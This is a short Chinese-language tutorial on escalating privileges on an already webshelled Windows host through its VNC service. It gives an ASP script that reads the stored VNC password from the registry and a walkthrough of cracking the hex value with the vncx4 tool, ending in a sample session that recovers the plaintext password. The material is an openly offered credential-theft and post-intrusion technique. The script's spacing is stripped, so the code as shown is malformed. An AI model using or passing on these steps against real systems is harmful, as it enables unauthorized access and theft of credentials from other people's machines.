利用VNC服务提升权限方法总结

如果得到了一个主机的WEBSHELL，想提升权限，发现主机运行了VNC服务，就可以考虑用下面的方法。
默认情况下VNC服务端的密码是放在注册表中的，本文只针对这种情况。
首先用ASP读出注册表中的加密密码，然后用破解工具破解。
我给出大家一个读取VNC密码的ASP脚本，默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password


SetWshShell=server.createObject("WScript.Shell")

bkey=WSHShell.RegRead("HKCU\Software\ORL\WinVNC3\Password")

foreachstrinbkey

response.writehex(str)

next


读取出来后结果类似494015F9A35E8B22这种十六进制，这是VNC加密的密码。我们可以用vncx4
破解它，vncx4使用很简单，只要在命令行下输入
c:\>vncx4-W
然后顺序输入上面的每一个十六进制数据，没输完一个回车一次就行了。
比如我给个测试


H:\tool>vncx4-W

49

40

15

F9

A3

5E

8B

22

EnteredHEXString:494015f9a35e8b22

VNCPassword:123456

 

*